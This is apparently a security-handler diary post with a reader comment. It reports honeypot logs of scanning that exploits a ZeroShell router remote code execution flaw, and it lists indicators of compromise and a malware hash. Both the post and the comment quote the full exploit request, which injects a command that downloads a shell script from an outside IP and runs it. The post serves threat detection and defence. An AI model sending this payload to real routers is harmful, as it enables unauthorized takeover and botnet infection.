In the past 36 hours, an increase in scanning activity to exploit and compromise ZeroShell Linux router began. This router software had several unauthenticated remote code execution released in the past several years, the last one was CVE-2019-12725. The router latest software version can be dowloaded here. This is an example of the logs captured by the honeypot: 20200719-094737: 192.168.25.9:80-138.91.224.48:59932 data 'GET /cgi-bin/kerbynet?Section=NoAuthREQ&Action=x509List&type=*";cd /tmp;curl -O http://5.206.227[.]228/zero;sh zero;" HTTP/1.0 Each shell scripts listed below download various forms of exploit against ZeroShell routers. Content of filename zero Indicators of Compromise http://5.206.227[.]228/zero -> Shell Script Snapshot of some of the content in filename bot.x86 SH256 Hash bot.x86 ebfa0aa59700e61bcf064fd439fb18b030237f14f286c6587981af1e68a8e477 [1] https://zeroshell.org/ ----------- |
Guy 523 Posts ISC Handler Jul 19th 2020 |
Thread locked Subscribe |
Jul 19th 2020 1 year ago |
I am seeing a lot of traffic in my organization example : cgi-bin/kerbynet?Section=NoAuthREQ&Action=x509List&type=*\"\";cd%20/tmp;curl%20-O%20http://5.206.227.228/zero;sh%20zero;\"\""
scans happening continously from various source IP addresses , firewall categorizes this as low severity though..but given the volume of this since 15th July we are in discusison with them |
Anonymous |
Quote |
Jul 21st 2020 1 year ago |
Sign Up for Free or Log In to start participating in the conversation!